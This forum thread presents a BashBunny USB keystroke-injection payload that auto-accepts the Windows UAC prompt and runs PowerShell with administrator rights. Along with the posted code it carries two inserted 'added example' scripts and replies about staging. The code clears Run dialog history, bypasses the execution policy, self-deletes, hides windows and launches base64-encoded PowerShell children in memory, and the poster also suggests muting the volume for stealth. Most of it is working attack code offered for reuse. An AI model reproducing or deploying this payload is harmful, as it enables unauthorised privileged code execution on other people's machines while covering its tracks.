
Possible UAC bypass solution


Dracstic


Hello all,

I'm working on a project that requires multiple programs to run in parallel and when started individually each one triggers a UAC window. After some tinkering I came to the following solution and wanted to pass it along. Hope it helps.

It starts with modifying the run.sh file in the extensions folder. I added the following code after the line "case "$os" in". This isn't strictly needed but I plan on using this in the future as well.

WIN_UAC)
    # Open the Run dialog and type whatever was passed to RUN
    QUACK GUI r
    QUACK DELAY 500
    QUACK STRING "$@"
    # CTRL-SHIFT-ENTER runs the Run dialog entry as administrator
    QUACK CTRL-SHIFT ENTER
    QUACK DELAY 1000
    # ALT-y answers "Yes" on the UAC consent prompt
    QUACK ALT y
    QUACK ALT c
    QUACK LEFTARROW
    QUACK ENTER
    QUACK ENTER
    ;;

 

I then created the BashBunny payload that would copy the file p2.ps1 from the switch# folder to the root of the USB storage and then call a quick powershell script using the new RUN WIN_UAC command that I just added.

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
# Stage p2.ps1 at the root of the storage partition so p1.ps1 can find it without knowing the switch folder
cp /root/udisk/payloads/$SWITCH_POSITION/p2.ps1 /root/udisk/p2.ps1

######## ATTACK ########
LED ATTACK
Q DELAY 1000
# Find the BashBunny volume by label on the target and run p1.ps1 from the switch folder, elevated through the new WIN_UAC case
RUN WIN_UAC "powershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\p1.ps1')"
######## FINISH ########
LED FINISH

 

The RUN WIN_UAC command will run the PowerShell script p1.ps1 with administrator privileges. p1.ps1 will copy p2.ps1 from the root of the BashBunny storage to a temporary folder on the PC and then run p2.ps1 with admin privileges. At this time the BashBunny can be unplugged.

#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear the Run dialog history
Set-ExecutionPolicy bypass -force #Allow unsigned scripts to run (this is the script execution policy, not UAC; UAC was already answered when this console was opened elevated)
Copy-Item ((gwmi win32_volume -f 'label=''BashBunny''').Name+'p2.ps1') -Destination $env:temp; Start-Process powershell (($env:temp)+'\p2.ps1') #Copy p2.ps1 from the BashBunny storage root to the temp folder on the PC, then run it in a new process that inherits this one's elevated token

 

P2.ps1 will run with admin privileges from the temporary folder and when its job is complete will delete itself and end the PowerShell process.

#Setup
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue #Clear the Run dialog history
Set-ExecutionPolicy bypass -force #Allow unsigned scripts to run (execution policy, not UAC)


#Your payload here with all the privileges.


Remove-Item $PSCommandPath #Delete this script file (p2.ps1 in the temp folder); PowerShell already has it in memory so the running script is unaffected
Stop-Process -Id $PID #End this process
#End ################################################################################################



To add stealthiness I would add -windowstyle hidden to the Start-Process lines as well as turn down the volume or mute before the UAC window is triggered.

 

What do you think?
Drac.

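Added example, my own code rather than anything from Drac's post: a first stage written the way I would want it before trusting the keystroke sequence above. It checks that the console really is elevated before doing anything (if the UAC prompt was not answered, p1.ps1 as posted would just run the payload as a standard user), polls for the BashBunny volume instead of assuming it is already mounted, and scopes the execution-policy bypass to the child process with -ExecutionPolicy Bypass rather than changing the machine-wide policy. The volume label 'BashBunny', the p2.ps1 file name at the storage root and the function names are assumptions following the thread.

```powershell
# Added example, not code from the post above. Assumptions: volume label
# 'BashBunny', second stage named p2.ps1 at the storage root, function names
# are my own.

function Test-IsElevated {
    # True only if the current token holds the Administrators role, i.e. the
    # UAC consent actually went through.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-BunnyRoot {
    param([string]$Label = 'BashBunny', [int]$Retries = 10)
    # The storage half of ATTACKMODE HID STORAGE can lag behind the HID half,
    # so poll for the volume instead of failing on the first miss.
    for ($i = 0; $i -lt $Retries; $i++) {
        $vol = Get-CimInstance Win32_Volume -Filter "Label='$Label'"
        if ($vol -and $vol.Name) { return $vol.Name }   # e.g. 'E:\'
        Start-Sleep -Milliseconds 500
    }
    throw "No volume labelled '$Label' found after $Retries attempts"
}

if (-not (Test-IsElevated)) {
    # The CTRL-SHIFT-ENTER / ALT-y sequence did not produce an elevated token
    # (timing was off, the prompt asked for credentials because the user is not
    # a local admin, or it was dismissed). Stop here rather than running the
    # payload unelevated and leaving artifacts behind.
    Write-Warning 'Not elevated; aborting first stage.'
    exit 1
}

# Remove the Run dialog history entry the HID attack just created.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

$root  = Get-BunnyRoot
$stage = Join-Path $env:TEMP 'p2.ps1'
Copy-Item -Path (Join-Path $root 'p2.ps1') -Destination $stage -Force

# The child inherits this process's elevated token. -ExecutionPolicy Bypass on
# the command line applies to that one process only, so nothing is changed
# machine-wide and there is nothing to undo afterwards.
Start-Process -FilePath powershell.exe -WindowStyle Hidden -ArgumentList @(
    '-NoProfile', '-ExecutionPolicy', 'Bypass', '-File', $stage
)
```

Run it in place of p1.ps1 with the same RUN WIN_UAC line. If the elevation check fails the script exits 1 and the LED on the Bunny will still go to FINISH, so on a real engagement you would want the payload to watch for a marker file before reporting success.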

You can create a stager to handle the download and execution of all your scripts under the same admin context without having to repeatedly launch a new process via quack commands.

Staging is using one script or program to download and launch additional scripts. You would use ps1 to get a bypassed instance with your WIN_UAC function. Inside the ps1 you would have additional commands to start new processes for each script. Because ps1 was started elevated, anything it runs will run elevated too.

So inside ps1 you could

Start-Process Powershell -argumentlist "<path to powershell script> <arguments for script>"

Also, I do not see the need to move the scripts around from their switch folder.  If ps1 launched from the BB payload switch folder then ps2 can too.


I'll keep that in mind.

Running one script from the bashbunny would work great for quick jobs. Unfortunately the project I'm working on downloads and runs multiple executables and takes over an hour to complete. I know powershell scripts are copied to and run from memory but I was having issues with reliability after the script was started and the bashbunny was unplugged. With the two script setup I can unplug the bashbunny as soon as the first script closes.


Why would you have to wait? You can fire off each script in parallel too in the powershell script. "Start-Process" is non-blocking.

In ps1 you would have two Start-Process calls for powershell, with the argument for the first script in the first one and the second script in the second one, or a third one for a third script. Start-Process will fire them off one after another but will not wait for them to finish before firing off the others. It will only wait if you use Wait-Process. At the end of the ps1 file you can signal however you like to the Bunny that you are done, so you can pull the Bash Bunny.

Running them in memory means firing off a "start-process powershell", but the argument will be a command to Get-Content and iex one of those scripts. Now your iex is in another powershell process and not holding up ps1.

Remember Start-Process if you want something run outside of your current process. Remember you can pass the job of grabbing and running that script to that process. If you really feel like coding you can grab the script and Unicode base64 encode it, then run "start-process powershell" and use "-E" for the argument with the base64 encoded script... if it is not bigger than 8.9k characters. I am rounding.

 

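Added example, my own code and not from either poster, putting the staging approach from the two replies above into one script: an elevated stager that reads each task script off the Bunny, ships it into its own hidden PowerShell process through -EncodedCommand (Unicode base64, as described) so the child no longer needs the file, starts them all without blocking, then drops a marker file on the Bunny so the payload can tell the stick is safe to pull. The volume label 'BashBunny', the payloads\switch1\ folder, the task1..task3.ps1 names, the marker file name and the 8000-character cutoff are assumptions.

```powershell
# Added example, not code from the thread. Assumptions: volume label
# 'BashBunny', task scripts under payloads\switch1\, marker file name
# 'stage-loaded'; function names are my own.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # powershell.exe -EncodedCommand (-E) takes base64 of the UTF-16LE text.
    $enc = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
    # Stay under the 8191-character command line limit that applies when the
    # command goes through cmd.exe; anything larger is better passed by path.
    if ($enc.Length -gt 8000) {
        throw "Encoded command is $($enc.Length) chars; pass this script by path (-File) instead."
    }
    return $enc
}

function Start-ElevatedScript {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$ScriptArgs = @()
    )
    # Read the script text now and carry it inside the child's command line, so
    # the child does not depend on the file (or the Bunny) once it has started.
    $body    = Get-Content -Path $Path -Raw
    $wrapper = "& {`n$body`n} $($ScriptArgs -join ' ')"
    $enc     = ConvertTo-EncodedCommand -Script $wrapper
    # Start-Process returns as soon as the child exists; -PassThru hands back the
    # Process object so the caller can Wait-Process on it later if it wants to.
    # The child inherits this process's elevated token.
    return Start-Process -FilePath powershell.exe -PassThru -WindowStyle Hidden -ArgumentList @(
        '-NoProfile', '-NonInteractive', '-EncodedCommand', $enc
    )
}

$bunny   = (Get-CimInstance Win32_Volume -Filter "Label='BashBunny'").Name
$scripts = 'task1.ps1', 'task2.ps1', 'task3.ps1' |
    ForEach-Object { Join-Path $bunny "payloads\switch1\$_" }

# All three start back to back; none of them holds up the stager.
$children = foreach ($s in $scripts) { Start-ElevatedScript -Path $s }

# Every child now has its script in memory: signal that the Bunny can go.
New-Item -Path (Join-Path $bunny 'stage-loaded') -ItemType File -Force | Out-Null

# Optional: block until they all exit. They keep running after the Bunny is
# unplugged because nothing they need is still on it.
$children | Wait-Process
```

How the payload.txt side notices the marker file is left to the payload; the point is that the stager writes it only after every child process has its script loaded, which is the moment the thread is after.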
